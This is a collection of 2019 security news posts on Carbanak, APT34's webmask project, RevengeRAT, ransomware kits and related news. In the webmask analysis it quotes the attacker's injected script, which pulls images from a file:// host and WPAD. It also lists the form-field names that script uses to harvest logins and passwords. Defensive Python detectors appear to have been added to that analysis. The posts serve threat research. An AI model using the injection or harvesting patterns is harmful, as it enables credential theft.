Cybersecurity researchers from FireEye revealed that the Carbanak source code has been available on VirusTotal for two years, and no one noticed it before.

Researchers at FireEye discovered that the Carbanak source code has been available on VirusTotal for two years, but it was not noticed before.

The Carbanak gang (aka FIN7, Anunak or Cobalt) stole over a billion euros from banks across the world; the name “Carbanak” comes from the name of the malware they used to compromise computers at banks, other financial institutions, restaurants, and other industries.

The CARBANAK cybercrime gang was first uncovered in 2014 by Kaspersky Lab, which dated its activity back to 2013, when the group leveraged the Anunak malware in targeted attacks on financial institutions and ATM networks. Between 2014 and 2016 the group used a new custom malware dubbed Carbanak, which is considered a newer version of Anunak.

Starting from 2016 the group developed a new custom malware using Cobalt Strike, a legitimate penetration testing framework.


The experts discovered the source code, builders, and some previously unknown plugins in two different RAR archives.

The two archives were both uploaded two years ago from the same Russian IP address.

“On the heels of that publication, our colleague Nick Carr uncovered a pair of RAR archives containing CARBANAK source code, builders, and other tools (both available in VirusTotal: kb3r1p and apwmie).” reads a blog post published by FireEye.

“CARBANAK source code was 20MB comprising 755 files, with 39 binaries and 100,000 lines of code. Our goal was to find threat intelligence we missed in our previous analyses.”

Last year, between January and June, law enforcement arrested three Ukrainian suspects: Dmytro Fedorov, Fedir Hladyr, and Andrii Kolpakov.

Fedorov, a skilled hacker who is suspected of being a manager of the group, was arrested at the request of U.S. officials in Bielsko-Biala, Poland, in January and is currently awaiting extradition to the United States.

In January 2018 foreign authorities also arrested Fedir Hladyr in Dresden, Germany; he is currently detained in Seattle pending trial. Hladyr is suspected of being a system administrator for the group.

In late June 2018, foreign authorities arrested Andrii Kolpakov in Lepe, Spain. The man is suspected of being a supervisor of the group. He is currently detained in Spain pending the United States’ request for extradition.

Pierluigi Paganini

(SecurityAffairs – Carbanak, Russia)

The post FireEye experts found source code for CARBANAK malware on VirusTotal appeared first on Security Affairs.

Iran-linked APT34: Analyzing the webmask project

Security expert Marco Ramilli published the findings of a quick analysis of the webmask project behind the DNS attacks carried out by APT34 (aka OilRig and HelixKitten).

Thanks to the leaked source code it is now possible to check APT34 implementations and techniques.


Since at least 2014, an Iranian threat group tracked by FireEye as APT34 has conducted reconnaissance aligned with the strategic interests of Iran. The group conducts operations primarily in the Middle East, targeting financial, government, energy, chemical, telecommunications and other industries. Repeated targeting of Middle Eastern financial, energy and government organisations leads FireEye to assess that those sectors are a primary concern of APT34. The use of infrastructure tied to Iranian operations, timing and alignment with the national interests of Iran also lead FireEye to assess that APT34 acts on behalf of the Iranian government. (Source: MISP Project).

On April 19, 2019, researchers at Chronicle, a security company owned by Google’s parent company Alphabet, examined the leaked tools, exfiltrated the previous week on a Telegram channel, and confirmed that they are indeed the same ones used by the OilRig attackers. OilRig has been connected to a number of intrusions at companies and government agencies across the Middle East and Asia, including technology firms, telecom companies, and even gaming companies. Whoever is leaking the toolset has also been dumping information about the victims OilRig has targeted, as well as data identifying some of the servers the group uses in its attacks.

According to Duo, OilRig has delivered Trojans that use DNS tunneling for command and control in attacks since at least May 2016. “Since May 2016, the threat group has introduced new tools using different tunneling protocols to their tool set,” Robert Falcone of Palo Alto Networks’ Unit 42 research team wrote in an analysis of the group’s activities.

“Regardless of the tool, all of the DNS tunneling protocols use DNS queries to resolve specially crafted subdomains to transmit data to the C2 and the answers to these queries to receive data from the C2.”

Leaked Source code

The initial leaked source code has three main folders: webmask, poisonfrog and Webshells_and_Panel. While webmask and poisonfrog seem to be single projects, the folder Webshells_and_Panel looks like it wraps several projects into a single bucket. But, for today, let’s focus on webmask.

WEBMask Focus

The webmask project, in my personal opinion, is an APT34 distinction, since it implements the core of their DNS attack. APT34 is well known to make wide use of DNS hijacking in order to redirect victims to attacker websites. So let’s see what they’ve implemented so far in this direction.

The webmask project comes with both a guide (guide.txt) and an installation script ( From the latter we can see the installed NodeJS version, which happens to be 6.X. This version was first released on 2016-04-26 and is still on the development track under the name “Boron”. According to the NodeJS version history, the project could not be dated before April 2016, since Nodejs_6.x did not exist before that date. The guide.txt file suggests two solutions (this is the term used), both of which base their ‘core engine’ on a custom DNS server, used as an authoritative name server that responds with crafted ‘A’ records to specific requests. The attackers suggest using solution2 (they write “use this” directly in the configuration file), the one which implements the DNS server in NodeJS. Solution1, on the other hand, uses Python for the DNS server. The following image shows the suggested solution.

APT34: WebMask Project Suggested Solution

Some domain names and some IPs are used as configuration examples. Personally I always find it interesting to see the examples an attacker suggests, since they leave a marked flavour of her. This time the attacker used some target artefacts (IP and DNS) belonging to the ‘Arab Emirates’ net space, while she used as a responsive artefact (the one used to attack) an IP address belonging to a NovinVPS service.

The guide goes on to describe the setup of an ICAP proxy server, used to proxy the victims to the real destination while trapping the entire connection. The attacker suggests Squid3 and guides the operator through installing and configuring it. As ICAP handler she uses a simple Python script placed at icap/icap.py. This script has been developed to log and to modify the ICAP/connection flow coming from the squid3 proxy. Then the well-known Haproxy is used as a High Availability service to keep connections up, and finally certbot (Let’s Encrypt) is used to give squid3 a valid certificate (but this is neither a mandatory nor a suggested step).

DNS Server scripts

In the folder dns-redir three files are placed. A configuration file called config.json is used by the Python script. The Python script implements a class named MyUDPHandler, which is passed to the native SocketServer.UDPServer and used as UDP handler. The script overrides only DNS A records, and only if the requested name is included in the overrides object (a variable at the beginning of the source code). In other words, if the DNS request is for an A record and the requested name belongs to a specific domain, the script responds with the attacker’s IP address. The following image shows the main three steps of the override chain.

Three steps DNS overriding chain

According to guide.txt the suggested solution is not the Python script: the attacker prefers the dnsd.js script. This script does not appear to be externally configurable (it does not import config.json), so if you want to configure it you need to manually edit the script source code. The source is written in classic-style ECMAScript without any of the new operators/features introduced in ECMAScript6 and ECMAScript7. dnsd.js performs the same tasks as the Python script without any specific change.
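The defender’s counterpart of the override chain described above: an added example (not code from the leaked project) that parses a DNS response in wire format and flags A answers for a monitored name that do not match the addresses you expect, which is how a hijacked authoritative answer shows up on the wire. The monitored name, the expected address and the packet builder are constructed for the example.

```python
import struct

# Constructed allowlist of expected A records for names worth watching (placeholder values).
EXPECTED_A = {"mail.example.com": {"203.0.113.10"}}


def encode_name(name):
    """Encode a dotted name in DNS wire format (length-prefixed labels, zero terminator)."""
    out = b""
    for label in name.strip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_a_response(txid, name, ip, ttl=300):
    """Build a constructed DNS response packet for testing: one question, one A answer.
    The answer name is a compression pointer (0xC00C) back to the question at offset 12."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)   # QR=1, RD, RA; 1 question, 1 answer
    question = encode_name(name) + struct.pack("!HH", 1, 1)      # QTYPE=A, QCLASS=IN
    rdata = bytes(int(octet) for octet in ip.split("."))
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + rdata
    return header + question + answer


def read_name(pkt, off):
    """Decode a possibly compressed name starting at off; return (name, offset after it)."""
    labels = []
    end = None                      # where the caller continues once a pointer was followed
    hops = 0
    while True:
        ln = pkt[off]
        if (ln & 0xC0) == 0xC0:     # compression pointer: 14-bit offset into the packet
            hops += 1
            if hops > 16:
                raise ValueError("compression pointer loop")
            if end is None:
                end = off + 2
            off = struct.unpack("!H", pkt[off:off + 2])[0] & 0x3FFF
            continue
        if ln == 0:
            off += 1
            break
        labels.append(pkt[off + 1:off + 1 + ln].decode("ascii"))
        off += 1 + ln
    return ".".join(labels), (end if end is not None else off)


def parse_a_answers(pkt):
    """Return [(name, ipv4, ttl)] for every A record in the answer section."""
    _txid, _flags, qdcount, ancount, _ns, _ar = struct.unpack("!HHHHHH", pkt[:12])
    off = 12
    for _ in range(qdcount):        # skip the question section (name + QTYPE + QCLASS)
        _name, off = read_name(pkt, off)
        off += 4
    answers = []
    for _ in range(ancount):
        name, off = read_name(pkt, off)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        off += 10
        rdata = pkt[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rdlen == 4:
            answers.append((name, ".".join(str(b) for b in rdata), ttl))
    return answers


def check_response(pkt, expected=EXPECTED_A):
    """Flag A answers for monitored names that point somewhere other than the expected addresses."""
    alerts = []
    for name, ip, ttl in parse_a_answers(pkt):
        known = expected.get(name.lower())
        if known is not None and ip not in known:
            alerts.append(f"{name} -> {ip} (ttl={ttl}) not in expected {sorted(known)}")
    return alerts


if __name__ == "__main__":
    good = build_a_response(0x1234, "mail.example.com", "203.0.113.10")
    bad = build_a_response(0x1235, "mail.example.com", "198.51.100.7")
    print(check_response(good))   # []
    print(check_response(bad))    # one alert
```

Feeding it captured responses for your own zones (from a resolver log or a passive DNS tap) turns the override chain into a simple consistency check against what your authoritative servers should be answering.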

ICAP script

In the icap folder a Python script called icap.py is placed. This script handles ICAP flows coming from squid3, extracts the desired information and injects tracking pixels. The script implements a ThreadingSimpleServer based on SocketServer.ThreadingMixIn, the native framework for multi-threaded network servers. SocketServer.ThreadingMixIn needs a local address and local port to be spawned, and a BaseICAPRequestHandler class as second parameter in order to handle ICAP flows. The attacker specialised that class, referring to it as the general ICAPHandler. The aim of the script is to log, into separate files, the following information: credentials, cookies, injected files and headers. It silently injects a tracking pixel into communications by adding the following JavaScript to the HTML body.

script = ';$(document).ready(function(){$(\'<img src="file://[ip]/resource/logo.jpg"><img src="http://WPAD/avatar.jpg">\');});'

If the parsed request is an HTTP POST, the ICAPHandler tries to extract credentials through a dedicated function called extract_login_password. The following image shows the process flow of the credential extraction.

Credential Extraction Process

It would be interesting, at least from my point of view, to check the patterns used for login detection. For example, the parsing function looks for the following “form names”:

logins = ['login', 'log-in', 'log_in', 'signin', 'sign-in', 'logon', 'log-on']

It also looks for the following user field names:

userfields = ['log','login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name','alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname', 'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename', 'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username', 'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in', 'usuario']

and finally it also looks for the following password fields names:

passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword', 'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password','passwort', 'passwrd', 'wppassword', 'upasswd','senha','contrasena', 'secret']

It is interesting to see specific string patterns such as (but not limited to) form_pw, ahd_password, upassword, senha, contrasena, which are quite indicative of the victim scenarios. For example, strings such as senha, contrasena, usuario and so on seem to be Spanish/Portuguese words. So if this is true (and Google Translate agrees with me), it looks like APT34 is proxying some connections that might carry those username and password fields, which might point to Spanish/Portuguese targets. But this is only a hypothesis.

The icap.py script is also able to intercept basic authentication headers, cookies and general headers, implementing similar functions that extract interesting information and modify it if needed. I won’t describe every single function, but one of the most interesting ones, worth showing, is inject_RESPMOD, which injects a tracking image into the ICAP flow. The following image shows the attacker’s implementation of the inject_RESPMOD function.

script injection function

The injected script is added to the HTML body and, where the response is compressed, GZipped and shipped back. In this way the attacker tracks who lands on the target domain.
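Seen from the web-gateway side, the injection above leaves a recognisable trace: <img> tags whose source is a file:// path to an external host or the bare WPAD hostname, neither of which belongs in a normal page. The following added example (not code from the leaked project) unpacks an HTTP response, undoes the gzip encoding the script applies, and lists such image sources; the sample page and the 203.0.113.5 address are constructed placeholders.

```python
import gzip
import re

# Image sources the webmask injection adds: a file:// (UNC-style) path to an external host and a
# bare "WPAD" hostname. The regex also matches inside <script> strings, where the injection lives.
IMG_SRC_RE = re.compile(r"<img\b[^>]*?\bsrc\s*=\s*[\"']([^\"']+)[\"']", re.IGNORECASE)
SUSPICIOUS_SRC_RE = re.compile(r"^(?:file://|https?://wpad(?:[/:]|$))", re.IGNORECASE)


def split_http_response(raw):
    """Split a raw HTTP/1.x response into (status line, lowercase header dict, body bytes)."""
    head, _sep, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        key, _colon, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return lines[0], headers, body


def html_body(headers, body):
    """Return the body as text, transparently undoing a gzip Content-Encoding."""
    if headers.get("content-encoding", "").lower() == "gzip":
        body = gzip.decompress(body)
    return body.decode("utf-8", errors="replace")


def find_injected_images(raw_response):
    """List suspicious <img src=...> values found in an HTML response, in document order."""
    _status, headers, body = split_http_response(raw_response)
    if "text/html" not in headers.get("content-type", "").lower():
        return []
    return [src for src in IMG_SRC_RE.findall(html_body(headers, body))
            if SUSPICIOUS_SRC_RE.match(src)]


def make_sample_response(injected=True):
    """Constructed sample: a gzipped HTML page, optionally carrying a webmask-style tracking script.
    203.0.113.5 is a documentation-range placeholder, not a real indicator."""
    page = "<html><body><h1>Hello</h1><img src=\"/static/logo.png\">"
    if injected:
        page += ("<script>;$(document).ready(function(){$('<img src=\"file://203.0.113.5/resource/logo.jpg\">"
                 "<img src=\"http://WPAD/avatar.jpg\">');});</script>")
    page += "</body></html>"
    body = gzip.compress(page.encode("utf-8"))
    head = ("HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\n"
            "Content-Encoding: gzip\r\nContent-Length: %d\r\n\r\n" % len(body))
    return head.encode("ascii") + body


if __name__ == "__main__":
    print(find_injected_images(make_sample_response()))                 # two suspicious sources
    print(find_injected_images(make_sample_response(injected=False)))   # []
```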

Interesting points

  • WebMask is >= April 2016 (from installed dependencies)
  • APT34 might target the ‘Arab Emirates’ (from examples in config files)
  • APT34 might have Spanish/Portuguese targets (from code in the extract_login_password function)
  • APT34 might use NovinVPS (from examples in config files)
  • APT34 needs credentials to change the authoritative DNS (from guide.txt)

The original post is available at the following URL:

About the Author: Marco Ramilli, founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive research in Malware evasion techniques and penetration testing of electronic voting systems.

I do have experience on security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been in charge of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cybersecurity experiences by diving into SCADA security issues with some of the biggest industrial agglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence center I’ve ever experienced! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – APT34, DNS attacks)

The post Iran-linked APT34: Analyzing the webmask project appeared first on Security Affairs.

Campaign leverages, BlogSpot, and Pastebin to distribute RevengeRAT

Palo Alto Networks Unit 42 researchers uncovered a malicious campaign targeting entities in North America, Europe, Asia, and the Middle East with RevengeRAT.

The campaign was carried out during March; threat actors tracked as “Aggah” used pages hosted on, BlogSpot, and Pastebin as command-and-control (C2) infrastructure to distribute RevengeRAT.

Attackers hit organizations in several industries including Technology, Retail, Manufacturing, State/Local Government, Hospitality, Medical, and other Professional business.

“In March 2019, Unit 42 began looking into an attack campaign that appeared to be primarily focused on organizations within a Middle Eastern country.” reads the analysis published by Palo Alto Networks.

“Further analysis revealed that this activity is likely part of a much larger campaign impacting not only that region but also the United States, and throughout Europe and Asia.”

The usage of legitimate services to deliver the malware aims at avoiding detection.

RevengeRAT variants were used by different APT groups, such as The Gorgon Group, that hit entities in the UK, Spain, Russia and in the US. The source code of the RAT has been publicly leaked a few years ago and could be actually part of multiple campaigns conducted by several threat actors. 

RevengeRAT allows to open remote shells on the infected system, manage system files, processes, and services, log keystrokes, edit the Windows Registry, edit the hosts file, dump users passwords, and access the webcam, and many more actions.

Researchers analyzed a bait document built to load a malicious macro-enabled document from a remote server via Template Injection.

“These macros use BlogSpot posts to obtain a script that uses multiple Pastebin pastes to download additional scripts, which ultimately result in the final payload being RevengeRAT configured with a duckdns[.]org domain for C2.” continues the analysis.

“During our research, we found several related delivery documents that followed the same process to ultimately install RevengeRAT hosted on Pastebin, which suggests the actors used these TTPs throughout their attack campaign.”

Once victims open the decoy document, it displays a lure image designed to trick them into enabling Microsoft Office macros via “Enable Editing.” If the victim enables the macros, a remote OLE document containing the malicious macro is loaded using template injection.

The OLE file loaded an embedded Excel document which would download a malicious script from a shortened URL using the service. In a similar way, the malicious code was also downloaded in other attacks from a Blogspot domain hosting a malicious JavaScript.

“The malicious script carries out several activities on the compromised system. First, it attempts to hamper Microsoft Defender by removing its signature set. The script also kills the Defender process along with the processes for several Office applications.” reads the analysis.

Experts pointed out that the technique of enabling macros and disabling ProtectedView in Office and the tactic of killing processes for Windows Defender and Microsoft Office applications were employed by Gorgon group in past campaigns. 

Once downloaded on a victim’s machine, the script will perform the following main actions:

• Downloading a payload from a Pastebin URL
• Creating a scheduled task to periodically obtain and run a script from a Pastebin URL
• Creating an autorun registry key to obtain and run a script from a Pastebin URL

The last-stage malware is downloaded from Pastebin; it is a RevengeRAT variant dubbed “Nuclear Explosion” that uses the lulla.duckdns[.]org domain as C2.

The analysis of a single shortened URL revealed it was clicked over 1,900 times by targets in roughly 20 countries; this figure gives an idea of the extent of the campaign.

The analysis of decoy document’s properties allowed the experts to discover a number of other RevengeRAT samples used in this campaign.

Despite this, the Palo Alto Networks researchers conclude that there is no “concrete evidence that this attack campaign is associated with Gorgon.”

Pierluigi Paganini

(SecurityAffairs – hacking, RevengeRAT)

The post Campaign leverages, BlogSpot, and Pastebin to distribute RevengeRAT appeared first on Security Affairs.

Sure Sense AI Technology Promises Less Malware Infection In HP Laptops

The term Artificial Intelligence has been abused for at least the last five years, and is still being abused, by many marketing teams. It is like the magic word that may help a company persuade more buyers of an electronic product or a web service. Yes, there is real artificial intelligence in some products, such as console games, where the antagonists and NPCs (Non-playable characters) are controlled by artificial intelligence.

But what about a regular computer, such as an off-the-shelf laptop: is Artificial Intelligence in it useful at all? That is what HP is trying to convince its potential customers of with its Elitebook 800 laptop series for 2019. The AI technology built into the laptops of the Elitebook 800 series is dubbed “Sure Sense”, designed to help prevent malware on corporate workstation-class laptops through the use of hardware-based heuristic detection.

“This goes beyond every security technology today because today most primarily block against known malware. This [blocks] both known and unknown malware. It’s able to detect never-before-seen malware, and stop 99 percent of them in less than 20 seconds,” explained Alex Cho, HP’s Personal Systems Business President.

The Sure Sense technology is built into the UEFI of the Elitebook 800 laptops, which protects the firmware from being overwritten and tampered with by external software not approved by HP. Sure Sense also interacts with Windows 10, hardening the PC against malicious files and phishing links.

“One small breach can be catastrophic. You’ve sort of got to fight fire with fire. Malware is being created with AI, so you need to attack it with AI. It’s the brain that says, ‘I know what malware looks like—and this looks like a malware, this smells like a malware, it is malware. (Sure Sense will) be able to process that in real time—do it in the time it takes to open a file—and shut that process down,” added Cho.

It is not yet known how successful Sure Sense technology will be against malware, especially the top two types that give companies a run for their money: ransomware and cryptojacking. Intel and AMD more than a decade ago tried aggressively to prevent malware, or indeed any software, from executing code stored in the data buffer. Also known as the Execute Disable Bit, it lessens the effectiveness of malware, as processors that have the Execute Disable Bit strictly execute code only from the instruction cache.

“What they’re doing with AI, that is just far beyond what we’ve ever seen before. This is the active mitigation of attacks on a machine in real time. It’s a huge announcement for HP to get into that game. That’s not a traditional HP play. You’ve got firewall vendors that do this at the edge, you’ve got infrastructure vendors that do this on the internal side of the network, and then you have software manufacturers that are doing this on the endpoint. That disrupts a lot of things that we’re used to doing in the IT space,” said Juan Fernandez, ImageNet Consulting VP of Managed IT Services, when asked for feedback about HP Sure Sense.

Related Blogs:

Adopting Artificial Intelligence in Your Business

Web Malware Attack: The Different Stages

Core Factors of Artificial Intelligence to Enhance Cybersecurity

The post Sure Sense AI Technology Promises Less Malware Infection In HP Laptops appeared first on .

Security Affairs newsletter Round 210 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

Attackers hacked support agent to access Microsoft Outlook email accounts
Major coordinated disinformation campaign hit the Lithuanian Defense
Romanian duo convicted of fraud Scheme infecting 400,000 computers
Security Affairs newsletter Round 209 – News of the week
Whatsapp, Instagram, Facebook down worldwide
A new DDoS technique abuses HTML5 Hyperlink Audit Ping in massive attacks
Apache fixed an important RCE flaw in Tomcat application server
Gnosticplayers round 5 – 65 Million+ fresh accounts from 6 security breaches available for sale
Gnosticplayers round 5 – 65 Million+ fresh accounts from 8 security breaches available for sale
Locked Shields 2019 – Chapeau, France wins Cyber Defence Exercise
Yellow Pencil WordPress Plugin flaw expose tens of thousands of sites
Adblock Plus filter can be exploited to execute arbitrary code in web pages
Blue Cross of Idaho data breach, 5,600 customers affected
CVE-2019-0803 Windows flaw exploited to deliver PowerShell Backdoor
Ecuador suffered 40 Million Cyber attacks after the Julian Assange arrest
FireEye releases FLASHMINGO tool to analyze Adobe Flash files
Scranos – A Cross Platform, Rootkit-Enabled Spyware rapidly spreading
A new variant of HawkEye stealer emerges in the threat landscape
Code execution – Evernote
eGobbler hackers used Chrome bug to deliver 500Million+ ads to iOS users
European Commission is not in possession of evidence of issues with Kaspersky products
Justdial is leaking personal details of all customers real-time
RCE flaw in Electronic Arts Origin client exposes gamers to hack
Analyzing OilRigs malware that uses DNS Tunneling
APT28 and Upcoming Elections: evidence of possible interference (Part II)
Cisco addresses a critical bug in ASR 9000 series Routers
Drupal patched security vulnerabilities in Symfony, jQuery
Facebook ‘unintentionally collected contacts from 1.5 Million email accounts without permission
Russian TA505 threat actor target financial entities worldwide
Broadcom WiFi Driver bugs expose devices to hack
Facebook admitted to have stored millions of Instagram users passwords in plaintext
Operator of Codeshop Cybercrime Marketplace Sentenced to 90 months in prison
Ransomware attack knocks Weather Channel off the Air
Source code of tools used by OilRig APT leaked on Telegram
Avast, Avira, Sophos and other antivirus solutions show problems after
Google is going to block logins from embedded browsers against MitM phishing attacks
Hacker broke into super secure French Governments Messaging App Tchap hours after release
Marcus Hutchins pleads guilty to two counts of banking malware creation

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 210 – News of the week appeared first on Security Affairs.

INPIVX hidden service, a new way to organize ransomware attacks

A new service called Inpivx represents the evolution of the ransomware-as-a-service making it very easy for wannabe crooks to develop their malware and build a management panel.

A new Tor hidden service called Inpivx evolves the concept of the ransomware-as-a-service making it very easy for crooks without technical skills to develop their own malware and build a management panel.

Operators behind the service offer for sale the source code for the ransomware and for the management dashboard. The availability of the source code allows crooks to customize their ransomware.

Note that Inpivx is not a RaaS, and for this reason it does not supply hosting services.

The ransomware is written in C++ and supports almost any Windows OS version, from Windows XP through Windows 10, while the dashboard is coded in PHP.

The package goes for $500; it also includes the decryption tool, and the operators also provide a detailed tutorial.

“If the client has no skill, we provide a tutorial based on our own ransomware dashboard each line of code has an explanation,” an Inpivx member told BleepingComputer.

The dashboard provides infection data in real time: it includes the total number of encrypted files, the number of infections, the operating systems of the infected machines and their geographical distribution.

It also implements a chat that allows operators to communicate with the victims.

A specific clients section includes information on infected machines, such as the victim IDs, the operating system, the ransom price, the decryption key, and the payment status.

“Inpivx approach is highly likely to attract to the ransomware game individuals with expertise in other areas of the crime business.” wrote Ionut Ilascu from BleepingComputer. “With access to the source code, they can alter the original ransomware product and create new strains that could evolve to something new by combining code from other malware.”

Pierluigi Paganini

(SecurityAffairs – Tor, Inpivx)

The post INPIVX hidden service, a new way to organize ransomware attacks appeared first on Security Affairs.

Marcus Hutchins pleads guilty to two counts of banking malware creation

British malware researcher Marcus Hutchins has pleaded guilty to developing and sharing banking malware between July 2014 and July 2015.

The popular British cybersecurity expert Marcus Hutchins has pleaded guilty to developing and sharing the Kronos banking malware between July 2014 and July 2015.

Marcus Hutchins, also known as MalwareTech, made the headlines after discovering the “kill switch” that halted the outbreak of the WannaCry ransomware. In August 2017, he was arrested in Las Vegas after attending the Def Con hacking conference and was detained by the FBI in the state of Nevada.

In August 2017, Marcus Hutchins pleaded not guilty to charges of creating and selling malware at a hearing in Milwaukee, Wisconsin.
The court decided to relax the expert’s bail terms, allowing him to access the Internet and continue his ordinary working activities. The only restriction on Hutchins was that he could not visit the WannaCry server domain.

The decision was unusual because computer crime suspects are usually not allowed to stay online.

The court allowed him to live in Los Angeles, where the company that hired him is located, but he was obliged to surrender his passport and he must wear a tracking device until his trial in October.

On Friday, Hutchins accepted a plea deal and admitted two charges of malware development.

“I’ve pleaded guilty to two charges related to writing malware in the years prior to my career in security,” reads a statement published by the expert.

“I regret these actions and accept full responsibility for my mistakes. Having grown up, I’ve since been using the same skills that I misused several years ago for constructive purposes. I will continue to devote my time to keeping people safe from malware attacks.”

Marcus Hutchins faces a maximum penalty of five years in prison, a $250,000 fine and a year of probation.

According to federal law enforcement, the researcher told an unnamed associate over a recorded telephone line: “I used to write malware, they picked me up on some old shit,” and “I wrote code for a guy a while back who then incorporated it into a banking malware.”

Pierluigi Paganini

(Security Affairs – Marcus Hutchins, cybercrime)

The post Marcus Hutchins pleads guilty to two counts of banking malware creation appeared first on Security Affairs.

Scranos Rootkit Auto-Subscribes Users To Selected Youtube Channels

YouTube channels and malware are not words usually found in the same sentence, but that is changing, as a new, prolific rootkit-based malware named Scranos is causing havoc in the wild. It is the first known malware that automatically “subscribes” logged-in Google accounts to specific YouTube channels dictated by the command and control server. This appears to be a way to increase the “profitability” of the malware beyond its regular function of keylogging the user to steal login credentials for various web services such as Facebook, Amazon, AirBnB and YouTube. The malware is compatible with mainstream browsers, which means it can auto-subscribe the user to those channels in the hope of a better income stream. It has not yet been established whether the specific YouTube channels to which users are silently subscribed are related to Scranos’ authors.

“The motivations are strictly commercial. They seem to be interested in spreading the botnet to consolidate the business by infecting as many devices as possible to perform advertising abuse and to use it as a distribution platform for third party malware,” said Bogdan Botezatu, Bitdefender’s Director of Threat Research and Reporting.

Bitdefender is advising people to be careful when downloading random video playback and e-book reader apps, as Scranos is delivered as the payload of trojanized apps. Trojanized apps are real copies of the apps they claim to be, but with an included payload, usually malware code. “By using this approach, the hackers are more likely to infect targets. They are looking at advertising fraud by consuming ads on their publisher channels invisibly in order to pocket the profit. They are growing accounts that they have been paid to grow and helping inflate an audience so they can grow specific ‘influencer’ accounts,” added Botezatu. With a modular design, more functionality can be added to Scranos by its authors. At the moment, the malware can extract browsing history and account payment information, and display adverts that generate more profit for the malware authors.

The malware silently watches the computer; once the user logs in to Facebook, it can extract the user’s data (Facebook allows users to download their data manually). “If the user is logged into a Facebook account, it impersonates the user and extracts data from the account by visiting certain web pages from the user’s computer, to avoid arousing suspicion by triggering an unknown device alert. It can extract the number of friends, and whether the user administrates any pages or has payment information in the account. This is an extremely sophisticated threat that took a lot of time and effort to set up. Rootkit-based malware shows an unusual level of sophistication and dedication,” concluded Botezatu.

Upon further probing, it was disclosed that the malware also includes functionality that interacts with the Amazon website: it can store Amazon information and interact with the Amazon account through a specially designed DLL file. Scranos has no clear target countries, but the highest number of infections was seen in Italy, Indonesia, Romania, India, Brazil and France.

Related Resources:

Youtube Video Content Creators and Channel Subscribers Cautioned Of Malicious Posers

YouTube to Increase Security Across Its Office Worldwide

Malicious YouTube ads used to mine cryptocurrency

The post Scranos Rootkit Auto-Subscribes Users To Selected Youtube Channels appeared first on .

Marcus Hutchins: UK ransomware ‘hero’ pleads guilty to US hacking charges

Hutchins says he regrets his actions and will continue ‘keeping people safe from malware attacks’

A British computer security researcher once hailed as a “hero” for helping stem a ransomware outbreak and later accused of creating malware to attack the banking system said on Friday he had pleaded guilty to US criminal charges.

Marcus Hutchins, whose arrest in 2017 stunned the computer security community, acknowledged in a statement pleading guilty to criminal charges linked to his activity in 2014 and 2015.


Cyber News Rundown: Phishing Attack on Global IT Outsourcer

Reading Time: ~2 min.

Major IT Outsourcer Suffers After Phishing Attack

Global IT services provider Wipro announced they are investigating a data breach possibly affecting some of their clients. These companies are popular targets for hackers because, by breaching a single IT service company, they gain access to a far larger pool of victims through compromised credentials for client networks. It’s still unclear how long the hackers had access to the systems, but some reports claim the attack was ongoing for several months.

Age-Verification Hits UK Porn Viewers

The UK has passed a measure that will subject users to age verification before being allowed to enter a pornographic website, as part of its ongoing fight to make the UK safer online. This measure was originally introduced as a way to decrease ransomware infections and slow the stream of stolen credentials from paid accounts for higher-traffic sites. The new law has 88% backing from UK parents and will go into full effect on July 15.

Data Breach Affects Navicent Patients

A recent Navicent Health announcement revealed that the email systems of the health care services provider were compromised in July 2018, possibly affecting over 275,000 patients. While the remainder of their internal systems were untouched, the email server did contain patient data, including social security numbers and billing information. Fortunately, Navicent responded to the breach quickly and began notifying the proper authorities, as well as their client base, in addition to providing identity monitoring services for those whose information was exposed.

Chrome for iOS Bug Redirects Users to Ads

A new bug, found only in the iOS version of Chrome, has exposed up to half a million users to unwanted advertising redirects, sometimes from legitimate websites. The bug works by allowing malicious code to be executed from within page advertisements, which can then overlay onto the device’s screen until clicked. The majority of this campaign’s victims are based in the US and were targeted over a four-day period in early April.

Microsoft Loses Subdomain for Live Tiles

A German researcher recently took control of a subdomain used by Microsoft to help websites correctly format RSS feeds into a usable XML format for Windows 8 and 10 Live Tiles. Because the subdomain wasn’t registered to Microsoft or their Azure cloud services, any malicious actor could have taken it over; the researcher purchased it and alerted Microsoft to his findings.

The post Cyber News Rundown: Phishing Attack on Global IT Outsourcer appeared first on Webroot Blog.

Analyzing OilRig’s malware that uses DNS Tunneling

Iran-linked APT group OilRig is heavily leveraging on DNS tunneling for its cyber espionage campaigns, Palo Alto Networks reveals.

Security researchers at Palo Alto Networks reported that the Iran-linked APT group OilRig is heavily leveraging DNS tunneling for its cyber espionage campaigns.

OilRig is an Iran-linked APT group that has been active since at least 2014; it mainly targets organizations in the financial, government, energy, telecoms and chemical sectors in the United States and Middle Eastern countries.

